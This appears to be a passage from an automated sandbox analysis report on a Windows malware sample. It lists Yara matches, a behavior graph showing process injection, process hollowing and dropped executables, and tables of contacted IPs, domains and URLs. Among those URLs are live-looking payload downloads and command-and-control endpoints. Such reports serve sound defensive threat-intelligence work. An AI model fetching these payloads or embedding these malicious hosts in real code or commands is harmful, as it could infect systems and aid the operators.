Source: Yara match File source: 00000014.00000003.381054499.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.389798020.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.393288664.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.392382222.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.392760515.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.372026419.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.391797560.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E69F.exe PID: 1436, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 682150 Sample: 5tLwjRFzAW.exe Startdate: 11/08/2022 Architecture: WINDOWS Score: 100 70 linislominyt11.at 2->70 72 acacaca.org 2->72 74 2 other IPs or domains 2->74 80 Snort IDS alert for network traffic 2->80 82 Multi AV Scanner detection for domain / URL 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 11 other signatures 2->86 10 5tLwjRFzAW.exe 2->10         started        13 irbiwat 2->13         started        15 A658.exe 2->15         started        signatures3 process4 signatures5 118 Detected unpacking (changes PE section rights) 10->118 120 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->120 122 Maps a DLL or memory area into another process 10->122 17 explorer.exe 5 10->17 injected 124 Machine Learning detection for dropped file 13->124 126 Checks if the current machine is a virtual machine (disk enumeration) 13->126 128 Creates a thread in another existing process (thread injection) 13->128 process6 dnsIp7 62 linislominyt11.at 110.14.121.125, 49754, 49758, 49793 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->62 64 acacaca.org 175.120.254.9, 49755, 49760, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->64 66 12 other IPs or domains 17->66 44 C:\Users\user\AppData\Roaming\irbiwat, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\Temp69F.exe, PE32 17->46 dropped 48 C:\Users\user\AppData\Local\Temp\D0E3.dll, PE32 17->48 dropped 50 4 other malicious files 17->50 dropped 88 System process connects to network (likely due to code injection or exploit) 17->88 90 Benign windows process drops PE files 17->90 92 Deletes itself after installation 17->92 94 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->94 22 28E9.exe 25 17->22         started        27 A658.exe 17->27         started        29 33.exe 17->29         started        31 2 other processes 17->31 file8 signatures9 process10 dnsIp11 76 45.138.74.104, 49759, 80 HOSTGLOBALPLUS-ASRU Russian Federation 22->76 54 C:\Users\user\AppData\...\vcruntime140.dll, PE32 22->54 dropped 56 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 22->56 dropped 58 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 22->58 dropped 60 4 other files (none is malicious) 22->60 dropped 100 Multi AV Scanner detection for dropped file 22->100 102 Detected unpacking (changes PE section rights) 22->102 104 Detected unpacking (overwrites its own PE header) 22->104 116 2 other signatures 22->116 106 Machine Learning detection for dropped file 27->106 108 Contains functionality to inject code into remote processes 27->108 110 Injects a PE file into a foreign processes 27->110 33 A658.exe 1 16 27->33         started        112 Sample uses process hollowing technique 29->112 78 193.56.146.177, 49812, 80 LVLT-10753US unknown 31->78 114 Antivirus detection for dropped file 31->114 37 regsvr32.exe 31->37         started        file12 signatures13 process14 dnsIp15 68 api.2ip.ua 162.0.217.254, 443, 49804, 49814 ACPCA Canada 33->68 52 C:\Users\user\AppData\Local\...\A658.exe, PE32 33->52 dropped 39 A658.exe 33->39         started        42 icacls.exe 33->42         started        file16 process17 signatures18 96 Sample uses process hollowing technique 39->96 98 Injects a PE file into a foreign processes 39->98
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
211.59.14.90
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
185.237.206.60
 monsutiur4.com Ukraine
21100 ITLDC-NLUA true
110.14.121.125
 linislominyt11.at Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
62.204.41.178
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI false
45.138.74.104
 unknown Russian Federation
202306 HOSTGLOBALPLUS-ASRU true
190.117.75.91
 unknown Peru
12252 AmericaMovilPeruSACPE false
85.192.63.46
 unknown Russian Federation
47711 LINEGROUP-ASRU false
211.119.84.111
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR false
176.44.127.165
 unknown Saudi Arabia
25019 SAUDINETSTC-ASSA false
162.0.217.254
 api.2ip.ua Canada
35893 ACPCA false
193.56.146.177
 unknown unknown
10753 LVLT-10753US false
175.120.254.9
 acacaca.org Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true

Contacted Domains

Name IP Active
monsutiur4.com 185.237.206.60 true
rgyui.top 190.140.74.43 true
api.2ip.ua 162.0.217.254 true
linislominyt11.at 110.14.121.125 true
acacaca.org 175.120.254.9 true
moroitomo4.net unknown unknown
cucumbetuturel4.com unknown unknown
nusurionuy5ff.at unknown unknown
susuerulianita1.net unknown unknown
nunuslushau.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://limo00ruling.org/ true
  • URL Reputation: malware
 unknown
http://acacaca.org/lancer/get.php true
  • Avira URL Cloud: malware
 unknown
http://45.138.74.104/ true
  • Avira URL Cloud: safe
 unknown
http://85.192.63.46/f/1.exe true
  • Avira URL Cloud: malware
 unknown
http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02 false
  • Avira URL Cloud: safe
 unknown
http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1 true
  • Avira URL Cloud: safe
 unknown
http://lilisjjoer44.com/ true
  • URL Reputation: safe
 unknown
http://susuerulianita1.net/ true
  • URL Reputation: malware
 unknown
http://linislominyt11.at/ true
  • URL Reputation: malware
 unknown
http://mini55tunul.com/ true
  • URL Reputation: safe
 unknown
http://62.204.41.178/newfile.exe true
  • Avira URL Cloud: malware
 unknown
http://193.56.146.177/ false
  • Avira URL Cloud: safe
 unknown
http://nikogminut88.at/ true
  • URL Reputation: malware
 unknown
http://acacaca.org/lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C true
  • Avira URL Cloud: malware
 unknown
http://cucumbetuturel4.com/ true
  • URL Reputation: safe
 unknown